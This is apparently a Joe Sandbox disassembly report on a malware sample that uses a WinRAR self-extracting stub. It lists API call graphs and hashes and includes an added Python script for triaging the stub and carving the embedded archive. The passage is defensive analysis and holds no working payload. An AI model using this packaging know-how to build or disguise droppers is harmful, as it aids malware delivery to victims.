22470->22472 22472->22469 22474 d89ace DeleteObject 22472->22474 22473 d89adb 22525 d88adf GetDC GetDeviceCaps ReleaseDC 22473->22525 22474->22469 22476 d89ae4 22526 d88cf3 8 API calls ___scrt_get_show_window_mode 22476->22526 22478 d89aeb DeleteObject 22478->22467 22537 d7cacc 22479->22537 22483 d7caba 22483->22156 22485 d890c4 GdiplusShutdown CoUninitialize 22484->22485 22485->22172 22486->22162 22487->22170 22489 d7f35d GetModuleHandleW 22488->22489 22489->22395 22489->22396 22491 d7a8f4 GetVersionExW 22490->22491 22492 d7a930 22490->22492 22491->22492 22492->22410 22494 d8cec0 22493->22494 22495 d7f316 GetSystemDirectoryW 22494->22495 22496 d7f32e 22495->22496 22497 d7f34c 22495->22497 22498 d7f33f LoadLibraryW 22496->22498 22497->22410 22498->22497 22499->22402 22501 d920bb 22500->22501 22501->22433 22501->22501 22502->22449 22527 d88adf GetDC GetDeviceCaps ReleaseDC 22503->22527 22505 d88ac7 22506 d88ad3 22505->22506 22528 d88b22 GetDC GetDeviceCaps ReleaseDC 22505->22528 22506->22467 22506->22469 22506->22470 22509 d88bf1 SizeofResource 22508->22509 22510 d88c23 22508->22510 22509->22510 22511 d88c05 LoadResource 22509->22511 22510->22462 22511->22510 22512 d88c16 LockResource 22511->22512 22512->22510 22513 d88c2a GlobalAlloc 22512->22513 22513->22510 22514 d88c41 GlobalLock 22513->22514 22515 d88cb8 GlobalFree 22514->22515 22516 d88c4c __vswprintf_c_l 22514->22516 22515->22510 22517 d88c54 CreateStreamOnHGlobal 22516->22517 22518 d88c6c 22517->22518 22519 d88cb1 GlobalUnlock 22517->22519 22529 d88b65 GdipAlloc 22518->22529 22519->22515 22522 d88ca6 22522->22519 22523 d88c90 GdipCreateHBITMAPFromBitmap 22523->22522 22524->22473 22525->22476 22526->22478 22527->22505 22528->22506 22530 d88b77 22529->22530 22532 d88b84 22529->22532 22533 d88924 22530->22533 22532->22519 22532->22522 22532->22523 22534 d8894c GdipCreateBitmapFromStream 22533->22534 22535 d88945 GdipCreateBitmapFromStreamICM 22533->22535 22536 d88951 22534->22536 22535->22536 22536->22532 22538 
d7cad6 _wcschr __EH_prolog 22537->22538 22539 d7cb02 GetModuleFileNameW 22538->22539 22540 d7cb33 22538->22540 22541 d7cb1c 22539->22541 22560 d7973d 22540->22560 22541->22540 22545 d7cc9f 22546 d799e0 70 API calls 22545->22546 22555 d7cce9 22545->22555 22549 d7ccb9 ___std_exception_copy 22546->22549 22550 d7990d 73 API calls 22549->22550 22549->22555 22553 d7ccdf ___std_exception_copy 22550->22553 22552 d7cb63 22552->22545 22552->22555 22569 d79aeb 22552->22569 22584 d7990d 22552->22584 22592 d799e0 22552->22592 22553->22555 22597 d806e9 MultiByteToWideChar 22553->22597 22577 d79437 22555->22577 22556 d7ce48 GetModuleHandleW FindResourceW 22557 d7ce76 22556->22557 22558 d7ce70 22556->22558 22559 d7c91f 52 API calls 22557->22559 22558->22483 22559->22558 22561 d79747 22560->22561 22562 d7979d CreateFileW 22561->22562 22563 d7981b 22562->22563 22564 d797ca GetLastError 22562->22564 22563->22552 22598 d7b275 22564->22598 22566 d797ea 22566->22563 22567 d797ee CreateFileW GetLastError 22566->22567 22568 d79812 22567->22568 22568->22563 22570 d79b0f SetFilePointer 22569->22570 22571 d79afe 22569->22571 22572 d79b2d GetLastError 22570->22572 22574 d79b48 22570->22574 22571->22574 22611 d76eae 68 API calls 22571->22611 22572->22574 22575 d79b37 22572->22575 22574->22552 22575->22574 22612 d76eae 68 API calls 22575->22612 22578 d7945b 22577->22578 22583 d7946c 22577->22583 22579 d79467 22578->22579 22580 d7946e 22578->22580 22578->22583 22613 d795ea 22579->22613 22618 d794a3 22580->22618 22583->22556 22585 d79924 22584->22585 22587 d79985 22585->22587 22588 d79977 22585->22588 22590 d79987 22585->22590 22633 d79613 22585->22633 22587->22552 22645 d76e74 68 API calls 22588->22645 22590->22587 22591 d79613 5 API calls 22590->22591 22591->22590 22650 d79897 22592->22650 22595 d79a0b 22595->22552 22597->22555 22599 d7b282 22598->22599 22607 d7b28c 22599->22607 22608 d7b40f CharUpperW 22599->22608 22601 d7b29b 22609 d7b43b CharUpperW 22601->22609 22603 d7b2aa 22604 d7b325 
GetCurrentDirectoryW 22603->22604 22605 d7b2ae 22603->22605 22604->22607 22610 d7b40f CharUpperW 22605->22610 22607->22566 22608->22601 22609->22603 22610->22607 22611->22570 22612->22574 22614 d795f3 22613->22614 22615 d795f7 22613->22615 22614->22583 22615->22614 22624 d79dac 22615->22624 22619 d794cd 22618->22619 22620 d794af 22618->22620 22621 d794ec 22619->22621 22632 d76d80 67 API calls 22619->22632 22620->22619 22622 d794bb CloseHandle 22620->22622 22621->22583 22622->22619 22625 d8cec0 22624->22625 22626 d79db9 DeleteFileW 22625->22626 22627 d79611 22626->22627 22628 d79dcc 22626->22628 22627->22583 22629 d7b275 2 API calls 22628->22629 22630 d79de0 22629->22630 22630->22627 22631 d79de4 DeleteFileW 22630->22631 22631->22627 22632->22621 22634 d79621 GetStdHandle 22633->22634 22635 d7962c ReadFile 22633->22635 22634->22635 22636 d79645 22635->22636 22637 d79665 22635->22637 22646 d7971a 22636->22646 22637->22585 22639 d7964c 22640 d7965a 22639->22640 22641 d7966d GetLastError 22639->22641 22642 d7967c 22639->22642 22644 d79613 GetFileType 22640->22644 22641->22637 22641->22642 22642->22637 22643 d7968c GetLastError 22642->22643 22643->22637 22643->22640 22644->22637 22645->22587 22647 d79723 GetFileType 22646->22647 22648 d79720 22646->22648 22649 d79731 22647->22649 22648->22639 22649->22639 22653 d79902 22650->22653 22654 d798a3 22650->22654 22651 d798da SetFilePointer 22652 d798f8 GetLastError 22651->22652 22651->22653 22652->22653 22653->22595 22655 d76eae 68 API calls 22653->22655 22654->22651 22655->22595 22657 d9494d FindHandlerForForeignException 22656->22657 22658 d94965 22657->22658 22660 d94a9b _abort GetModuleHandleW 22657->22660 22678 d976d6 EnterCriticalSection 22658->22678 22661 d94959 22660->22661 22661->22658 22690 d94adf GetModuleHandleExW 22661->22690 22662 d94a0b 22679 d94a4b 22662->22679 22665 d9496d 22665->22662 22667 d949e2 22665->22667 22698 d95447 20 API calls _abort 22665->22698 22670 d949fa 22667->22670 22671 d956d0 _abort 5 API 
calls 22667->22671 22668 d94a28 22682 d94a5a 22668->22682 22669 d94a54 22699 d9f149 5 API calls ___delayLoadHelper2@8 22669->22699 22672 d956d0 _abort 5 API calls 22670->22672 22671->22670 22672->22662 22678->22665 22700 d9771e LeaveCriticalSection 22679->22700 22681 d94a24 22681->22668 22681->22669 22701 d97b13 22682->22701 22685 d94a88 22688 d94adf _abort 8 API calls 22685->22688 22686 d94a68 GetPEB 22686->22685 22687 d94a78 GetCurrentProcess TerminateProcess 22686->22687 22687->22685 22689 d94a90 ExitProcess 22688->22689 22691 d94b09 GetProcAddress 22690->22691 22692 d94b2c 22690->22692 22695 d94b1e 22691->22695 22693 d94b3b 22692->22693 22694 d94b32 FreeLibrary 22692->22694 22696 d8d783 ___delayLoadHelper2@8 5 API calls 22693->22696 22694->22693 22695->22692 22697 d94b45 22696->22697 22697->22658 22698->22667 22700->22681 22702 d97b38 22701->22702 22706 d97b2e 22701->22706 22703 d97735 __dosmaperr 5 API calls 22702->22703 22703->22706 22704 d8d783 ___delayLoadHelper2@8 5 API calls 22705 d94a64 22704->22705 22705->22685 22705->22686 22706->22704 23783 d71019 29 API calls pre_c_initialization 23844 d97216 21 API calls 23845 d9ee16 CloseHandle 23812 d93501 QueryPerformanceFrequency QueryPerformanceCounter 23877 d9c301 21 API calls __vswprintf_c_l 23848 d90a00 6 API calls 3 library calls 23786 d8d002 38 API calls 2 library calls 23878 d96f03 21 API calls 2 library calls 23813 d80d3a 26 API calls std::bad_exception::bad_exception 23789 d9f830 DeleteCriticalSection 23879 d8d736 20 API calls 23815 d8a537 93 API calls _swprintf 23816 d95536 8 API calls ___vcrt_uninitialize 23713 d96428 23721 d9784c 23713->23721 23717 d96444 23718 d96451 23717->23718 23729 d96454 11 API calls 23717->23729 23720 d9643c 23722 d97735 __dosmaperr 5 API calls 23721->23722 23723 d97873 23722->23723 23724 d9788b TlsAlloc 23723->23724 23725 d9787c 23723->23725 23724->23725 23726 d8d783 ___delayLoadHelper2@8 5 API calls 23725->23726 23727 d96432 23726->23727 23727->23720 23728 d963a3 20 API 
calls 3 library calls 23727->23728 23728->23717 23729->23720 23794 d8b820 72 API calls 23817 d89123 73 API calls 23744 d8c726 19 API calls ___delayLoadHelper2@8

Control-flow Graph

APIs
  • Part of subcall function 00D7F353: GetModuleHandleW.KERNEL32 ref: 00D7F36B
  • Part of subcall function 00D7F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D7F383
  • Part of subcall function 00D7F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D7F3A6
  • Part of subcall function 00D88B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D88B96
  • Part of subcall function 00D89036: OleInitialize.OLE32(00000000), ref: 00D8904F
  • Part of subcall function 00D89036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D89086
  • Part of subcall function 00D89036: SHGetMalloc.SHELL32(00DB20E8), ref: 00D89090
  • Part of subcall function 00D80722: GetCPInfo.KERNEL32(00000000,?), ref: 00D80733
  • Part of subcall function 00D80722: IsDBCSLeadByte.KERNEL32(00000000), ref: 00D80747
• GetCommandLineW.KERNEL32 ref: 00D8C179
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D8C1A0
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D8C1B1
• UnmapViewOfFile.KERNEL32(00000000), ref: 00D8C1EB
  • Part of subcall function 00D8BE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D8BE20
  • Part of subcall function 00D8BE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D8BE5C
• CloseHandle.KERNEL32(00000000), ref: 00D8C1F4
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe,00000800), ref: 00D8C20F
• SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe), ref: 00D8C221
• GetLocalTime.KERNEL32(?), ref: 00D8C228
• _swprintf.LIBCMT ref: 00D8C267
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D8C279
• GetModuleHandleW.KERNEL32(00000000), ref: 00D8C27C
• LoadIconW.USER32(00000000,00000064), ref: 00D8C293
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 00D8C2E4
• Sleep.KERNEL32(?), ref: 00D8C312
• DeleteObject.GDI32 ref: 00D8C351
• DeleteObject.GDI32(?), ref: 00D8C35D
  • Part of subcall function 00D8A8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 00D8A92C
  • Part of subcall function 00D8A8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 00D8A953
• CloseHandle.KERNEL32 ref: 00D8C39C
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
• String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
• API String ID: 985665271-2957653273
• Opcode ID: 886238570596f60b798bcf7e8c73448256050ee1543839f050c01cfa97784f39
• Instruction ID: 3ea48ac26b3f786570ada11e729109af20f31c2155451d03c0008eecdd8194db
• Opcode Fuzzy Hash: 886238570596f60b798bcf7e8c73448256050ee1543839f050c01cfa97784f39
• Instruction Fuzzy Hash: 7561C072904301EED321BB69EC4AF7B3BA8EB49750F044519F545D33A1EB799804CBB2
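The listing above is the startup path of the WinRAR self-extracting (SFX) module, not of the RAT itself: the stub opens the `winrarsfxmappingfile.tmp` mapping through which a parent SFX instance can hand over its command line, exports the `sfxcmd`, `sfxpar`, `sfxname` and `sfxstime` variables that WinRAR documents for SFX scripts (the `%4d-%02d-%02d-%02d-%02d-%02d-%03d` format is the start timestamp written into `sfxstime`), and shows the `STARTDLG` dialog. The `__tmp_rar_sfx_access_check_%u` and `-el -s2 "-d%s" "-sp%s"` strings in a later record are, respectively, the probe file the stub creates to test write access to its destination and the argument line it uses to re-launch itself. What the sample actually drops and runs is decided by the RAR archive appended after this stub and by the SFX script stored in that archive's comment, so the useful triage step is to confirm the stub and carve the archive. The following Python is an added example, not code from Joe Sandbox or from WinRAR: it matches the stub strings the report lists (as UTF-16LE, since the stub passes them to the W-suffixed APIs shown) and finds the appended archive by the `Rar!` signature defined by the RAR format (RAR 1.5 to 4.x and RAR5 variants). The blob it builds is constructed for the example and is not the analysed file; `sfx_triage.py` and the output path are assumed names.

```python
"""Triage helper for a suspected WinRAR self-extracting (SFX) archive.

Added example, not part of the Joe Sandbox report or of WinRAR. It checks a PE
image for the SFX-stub strings the report lists and carves the RAR archive that
the stub carries after itself, so the archive (and the SFX script stored in its
comment) can be examined without running the sample.
"""

# Archive signatures from the RAR format specification (RAR 1.5-4.x and RAR5).
RAR4_SIGNATURE = b"Rar!\x1a\x07\x00"
RAR5_SIGNATURE = b"Rar!\x1a\x07\x01\x00"

# Strings the report lists for the stub, matched as UTF-16LE because the stub
# hands them to W-suffixed Win32 APIs (OpenFileMappingW, SetEnvironmentVariableW,
# DialogBoxParamW).
SFX_STUB_STRINGS = (
    "winrarsfxmappingfile.tmp",                 # mapping used to pass a command line between SFX instances
    "sfxcmd", "sfxpar", "sfxname", "sfxstime",  # environment variables the stub exports to its script
    "STARTDLG", "LICENSEDLG",                   # dialog resources the stub shows
    "__tmp_rar_sfx_access_check_%u",            # probe file used to test write access to the target directory
    '-el -s2 "-d%s" "-sp%s"',                   # argument line of the stub's re-launch of itself
)


def find_rar_archive(data: bytes):
    """Return (offset, version) of the earliest RAR signature in data, or None."""
    candidates = []
    for signature, version in ((RAR4_SIGNATURE, "RAR4"), (RAR5_SIGNATURE, "RAR5")):
        offset = data.find(signature)
        if offset != -1:
            candidates.append((offset, version))
    # Tuples compare by offset first, so min() picks the earliest signature.
    return min(candidates) if candidates else None


def stub_strings_present(data: bytes):
    """Return the subset of SFX_STUB_STRINGS found (UTF-16LE) in data, in listing order."""
    return [s for s in SFX_STUB_STRINGS if s.encode("utf-16-le") in data]


def triage_sfx(data: bytes) -> dict:
    """Classify a file image and report where its embedded archive starts."""
    result = {
        "is_pe": data[:2] == b"MZ",
        "stub_strings": stub_strings_present(data),
        "rar_offset": None,
        "rar_version": None,
    }
    hit = find_rar_archive(data)
    if hit:
        result["rar_offset"], result["rar_version"] = hit
    # A PE that carries both the stub strings and an appended archive is an SFX;
    # a bare signature hit without stub strings is only a lead.
    result["is_winrar_sfx"] = bool(result["is_pe"] and result["stub_strings"] and hit)
    return result


def carve_archive(data: bytes) -> bytes:
    """Return the bytes from the archive signature to end of file (empty if none)."""
    hit = find_rar_archive(data)
    return data[hit[0]:] if hit else b""


def build_constructed_sample() -> bytes:
    """Constructed stand-in for an SFX: a fake MZ header, three stub strings as
    NUL-terminated UTF-16LE, then a RAR5 archive. Fabricated for this example only."""
    header = b"MZ" + b"\x00" * 62
    strings = b"".join(
        s.encode("utf-16-le") + b"\x00\x00"
        for s in ("winrarsfxmappingfile.tmp", "sfxcmd", "STARTDLG")
    )
    archive = RAR5_SIGNATURE + b"<archive body; the SFX script would sit in its comment>"
    return header + strings + archive


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_constructed_sample()
    report = triage_sfx(blob)
    print(report)
    if report["is_winrar_sfx"] and len(sys.argv) > 2:
        with open(sys.argv[2], "wb") as out:
            out.write(carve_archive(blob))
```

Run it as `python sfx_triage.py sample.exe carved.rar`, then `unrar cw carved.rar script.txt` (or a 7-Zip listing, which shows the comment) dumps the archive comment, which is where a WinRAR SFX keeps its script (`Setup=`, `Silent=`, `TempMode`, `Path=` and similar); that script, not the stub disassembly above, states what gets written and executed. The `Rar!` signature can also occur as ordinary data inside a PE, so treat a signature hit without the stub strings as a lead to confirm by extraction rather than as a verdict.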

Control-flow Graph

control_flow_graph 598 d88bd0-d88beb FindResourceW 599 d88bf1-d88c03 SizeofResource 598->599 600 d88cc6-d88cc8 598->600 601 d88c23-d88c25 599->601 602 d88c05-d88c14 LoadResource 599->602 604 d88cc5 601->604 602->601 603 d88c16-d88c21 LockResource 602->603 603->601 605 d88c2a-d88c3f GlobalAlloc 603->605 604->600 606 d88cbf-d88cc4 605->606 607 d88c41-d88c4a GlobalLock 605->607 606->604 608 d88cb8-d88cb9 GlobalFree 607->608 609 d88c4c-d88c6a call d8e000 CreateStreamOnHGlobal 607->609 608->606 612 d88c6c-d88c84 call d88b65 609->612 613 d88cb1-d88cb2 GlobalUnlock 609->613 612->613 617 d88c86-d88c8e 612->617 613->608 618 d88ca9-d88cad 617->618 619 d88c90-d88ca4 GdipCreateHBITMAPFromBitmap 617->619 618->613 619->618 620 d88ca6 619->620 620->618
APIs
• FindResourceW.KERNELBASE(00000066,PNG,?,?,00D89AC8,00000066), ref: 00D88BE1
• SizeofResource.KERNEL32(00000000,75295780,?,?,00D89AC8,00000066), ref: 00D88BF9
• LoadResource.KERNEL32(00000000,?,?,00D89AC8,00000066), ref: 00D88C0C
• LockResource.KERNEL32(00000000,?,?,00D89AC8,00000066), ref: 00D88C17
• GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00D89AC8,00000066), ref: 00D88C35
• GlobalLock.KERNEL32(00000000), ref: 00D88C42
• CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D88C62
• GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D88C9D
• GlobalUnlock.KERNEL32(00000000), ref: 00D88CB2
• GlobalFree.KERNEL32(00000000), ref: 00D88CB9
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
• String ID: PNG
• API String ID: 3656887471-364855578
• Opcode ID: 4eaacbd400fe51b8390ed95a91ddeaa72a9f70428458ec92ba4275d9e073a8ff
• Instruction ID: 0486ba79e6ea16a42866d5b6356f818a97dedb36f0d8fe9e8dc6d7d2feafe61f
• Opcode Fuzzy Hash: 4eaacbd400fe51b8390ed95a91ddeaa72a9f70428458ec92ba4275d9e073a8ff
• Instruction Fuzzy Hash: CA213071602702AFC721AF61DD4996BBFA9EF8A791B090928F845D2264DF31D8049BB1

Control-flow Graph

control_flow_graph 860 d7a273-d7a299 call d8cec0 863 d7a30d-d7a316 FindNextFileW 860->863 864 d7a29b-d7a2ae FindFirstFileW 860->864 865 d7a32c-d7a32e 863->865 866 d7a318-d7a326 GetLastError 863->866 867 d7a334-d7a3dd call d7f10e call d7b902 call d801c1 * 3 864->867 868 d7a2b4-d7a2cf call d7b275 864->868 865->867 869 d7a3e2-d7a3f5 865->869 866->865 867->869 875 d7a2e6-d7a2ef GetLastError 868->875 876 d7a2d1-d7a2e4 FindFirstFileW 868->876 878 d7a2f1-d7a2f4 875->878 879 d7a300 875->879 876->867 876->875 878->879 881 d7a2f6-d7a2f9 878->881 882 d7a302-d7a308 879->882 881->879 884 d7a2fb-d7a2fe 881->884 882->869 884->882
APIs
• FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D7A16E,000000FF,?,?), ref: 00D7A2A8
• FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D7A16E,000000FF,?,?), ref: 00D7A2DE
• GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D7A16E,000000FF,?,?), ref: 00D7A2E6
• FindNextFileW.KERNEL32(?,?,?,?,?,?,00D7A16E,000000FF,?,?), ref: 00D7A30E
• GetLastError.KERNEL32(?,?,?,?,00D7A16E,000000FF,?,?), ref: 00D7A31A
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: FileFind$ErrorFirstLast$Next
• String ID:
• API String ID: 869497890-0
• Opcode ID: 5a86c168bc66a4e4ee8531f94cb6a8e255a43b1260dd8252e1431f9d231fa4b6
• Instruction ID: 79cc4fd41dbda0a3be5a78315b03d445db8a1e333c44d3c08c12411706769389
• Opcode Fuzzy Hash: 5a86c168bc66a4e4ee8531f94cb6a8e255a43b1260dd8252e1431f9d231fa4b6
• Instruction Fuzzy Hash: 4B414371608245AFC324EF68C884ADEF7E9FB89350F44461AF5DDD3240E774A9548BB2
APIs
• GetCurrentProcess.KERNEL32(?,?,00D94A30,?,00DA7F68,0000000C,00D94B87,?,00000002,00000000), ref: 00D94A7B
• TerminateProcess.KERNEL32(00000000,?,00D94A30,?,00DA7F68,0000000C,00D94B87,?,00000002,00000000), ref: 00D94A82
• ExitProcess.KERNEL32 ref: 00D94A94
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 36a93819ae73ba18f6e03918f82b6e9794b2e4fa8981082ef8c413761e85be78
• Instruction ID: dc1925edd593666d05474b380860e3be1b06d7339dde76ba86c7ac06fcb8a3fd
• Opcode Fuzzy Hash: 36a93819ae73ba18f6e03918f82b6e9794b2e4fa8981082ef8c413761e85be78
• Instruction Fuzzy Hash: 4DE0B631040608AFCF51AF64DD09E893F69EB51395F054414F8099A622CB35DD92CBB4
APIs
• __EH_prolog.LIBCMT ref: 00D7840E
• _memcmp.LIBVCRUNTIME ref: 00D78870
  • Part of subcall function 00D780F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,00D786E9,?,-00000930,?), ref: 00D781BB
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: CharH_prologUpper_memcmp
• String ID:
• API String ID: 4047935103-0
• Opcode ID: 28f838c3004818eed356585465c53afff90e24d8207c2d584bf9890cb5caa075
• Instruction ID: 38e4bebedd1fbbe3c73562db6144032a90c803b00c9820e3620acbd35d127842
• Opcode Fuzzy Hash: 28f838c3004818eed356585465c53afff90e24d8207c2d584bf9890cb5caa075
• Instruction Fuzzy Hash: 67721B71944185AEDF25DF64C889BF9BBA9EF05300F0CC1BAE94D9B142EB319A84D770
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: ed0d55f82ddc073102539cf63fa7f030661ded478f569d5808011787d2a856f3
• Instruction ID: ac6747a46ae7872c225164fb711074031916f5122ade38c8df1e365150312445
• Opcode Fuzzy Hash: ed0d55f82ddc073102539cf63fa7f030661ded478f569d5808011787d2a856f3
• Instruction Fuzzy Hash: FBD116B16047458FCB14EF28D88479ABBE0FF95304F08056DEC849B646D334E959CBB6
APIs
• __EH_prolog.LIBCMT ref: 00D89B54
  • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
  • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
